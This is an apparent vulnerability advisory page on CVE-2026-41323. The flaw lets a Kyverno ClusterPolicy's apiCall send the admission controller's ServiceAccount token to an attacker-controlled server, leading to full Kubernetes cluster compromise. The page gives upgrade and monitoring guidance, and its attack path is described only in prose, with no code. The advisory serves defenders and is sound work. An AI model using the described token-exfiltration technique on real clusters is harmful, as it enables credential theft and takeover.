External risk intelligence

Kyverno could allow internal attacker to gain full cluster control

CVE advisorySeverity: CRITICAL (CVSS 9.1)

CVE-2026-41323

An internal attacker can exploit a flaw in Kyverno to trick the system into sending sensitive authentication tokens to an unauthorized server. This allows them to steal administrative access and take full control of the entire computing cluster.

1Halo Surface Signal

Information Disclosure

Kyverno

before 1.16.41.17.0 to before 1.17.2

External exposure likelihood

Halo Surface Signal score for CVE-2026-41323

Kyverno is a Kubernetes admission controller operating strictly within internal cluster networks. It is not an internet-facing service or edge component. Successful exploitation requires an internal attacker with existing privileges to manipulate cluster policies, rather than access from the public internet.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Horizon Alert

Summary of the vulnerability and why it matters

This vulnerability in Kyverno allows an attacker with existing access to steal credentials. These credentials could then be used to gain full control of your cluster.

  • Stolen credentials grant full cluster control.
  • Affects systems using Kyverno's apiCall feature.
  • Requires existing access to exploit.

Attack Path

How an attacker could exploit the issue

An attacker with cluster administrator privileges can weaponize this by creating a Kyverno `ClusterPolicy` that uses the `apiCall` feature to send the admission controller's ServiceAccount token to an attacker-controlled server. This allows them to steal the token, which has permissions to modify webhook configurations, leading to full cluster compromise.

  • Internal attacker with admin rights
  • Malicious `ClusterPolicy` creation
  • Stolen SA token grants cluster control

Live Threat

Current exploitation, exposure, and threat context

This vulnerability in Kyverno allows an attacker to steal a service account token with broad permissions, enabling full cluster compromise. While the vulnerability itself is severe, its exploitability is limited to attackers who already have a foothold within the Kubernetes cluster. There are no immediate public exploit proofs of concept, and no observed exploitation in the wild.

  • Exploitation requires internal access.
  • No public exploits are known.
  • No KEV signals observed.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

Prioritize upgrading Kyverno to a patched version immediately. The vulnerability allows for full cluster compromise by an authenticated attacker who can manipulate policies. If patching is delayed, focus on monitoring network traffic and the admission controller's ServiceAccount token for suspicious activity.

  • Upgrade Kyverno to patched versions.
  • Monitor for unusual network requests.
  • Restrict ServiceAccount token access.

Frequently asked questions

What is Kyverno and how does CVE-2026-41323 affect it?

Kyverno is a policy engine for cloud native platforms. CVE-2026-41323 exploits a weakness in Kyverno's apiCall feature, allowing an attacker to steal the admission controller's ServiceAccount token. This token, if stolen, can lead to full cluster compromise. Versions 1.18.0-rc1, 1.17.2-rc1, and 1.16.4 of Kyverno have addressed this vulnerability.

What is the weakness in Kyverno's apiCall feature that leads to compromise?

The weakness lies in the apiCall feature of Kyverno's ClusterPolicy, which automatically attaches the admission controller's ServiceAccount token to outgoing HTTP requests without validating the service URL. This allows the URL to point to attacker-controlled servers, enabling token theft. The stolen token, due to the ServiceAccount's permissions to patch webhook configurations, grants an attacker full cluster compromise capabilities. This is classified as CWE-200 (Exposure of Sensitive Information to an...

How can an attacker exploit CVE-2026-41323 to gain cluster control, and what is the scope of this attack?

An attacker with existing administrative privileges within the cluster can create a malicious Kyverno ClusterPolicy. This policy leverages the apiCall feature to send the admission controller's ServiceAccount token to a server controlled by the attacker. Upon successful token theft, the attacker can then patch webhook configurations, thereby achieving full cluster compromise. The scope is limited to authenticated internal attackers with administrative rights.

What is the relevance of CVE-2026-41323, and why is it considered an external threat?

CVE-2026-41323 is relevant because it allows an internal attacker with existing access to steal credentials that grant full control of a Kubernetes cluster. While Kyverno operates within internal cluster networks and is not an internet-facing service, the CVSS v3.1 attack vector is 'Network' (AV:N), leading Halo to classify this CVE as external. Exploitation requires an internal attacker with privileges to manipulate cluster policies rather than direct public internet access.

What are the recommended steps to mitigate the risk associated with CVE-2026-41323?

The primary operational fix is to immediately upgrade Kyverno to a patched version, specifically 1.18.0-rc1, 1.17.2-rc1, or 1.16.4, or later. If an immediate upgrade is not feasible, focus on monitoring network traffic originating from the admission controller for suspicious requests and restrict access to the admission controller's ServiceAccount token. This vulnerability requires an authenticated attacker, so broader security best practices remain crucial.

References

Sources and related resources

Primary sources: NVD, CVE.org.

NVDPublished Modified